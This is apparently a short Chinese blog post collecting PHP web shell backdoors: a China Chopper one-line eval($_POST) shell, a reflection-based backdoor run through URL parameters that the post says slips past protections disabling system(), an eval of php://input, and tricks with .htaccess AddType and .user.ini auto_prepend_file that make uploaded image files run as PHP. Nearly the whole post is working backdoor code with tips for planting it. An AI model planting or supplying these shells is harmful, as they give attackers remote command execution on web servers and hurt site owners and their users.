phpspy 菜刀一句话<?php@eval($_POST[‘cmd‘]);?>
反射后门
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
调用如x.php?m=system&c=whoami
后门也可绕过某些检测禁用system函数的防护系统
php://input是用来接收post数据(这里有php://input的介绍)
<?php
@eval(file_get_contents(‘php://input‘))
?>
Post提交 system(‘whoami‘);
可以设置任意后缀也可以设置UTF7编码格式shell
AddType application/x-httpd-php .jpg
然后再传一个JPG结尾的shell,访问即可执行了
动态修改php.ini配置文件
User.ini
auto_prepend_file=demo.gif(准备用php://input呢 测试不成功 不知道为何)
本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1687963
原文:http://0x007.blog.51cto.com/6330498/1687963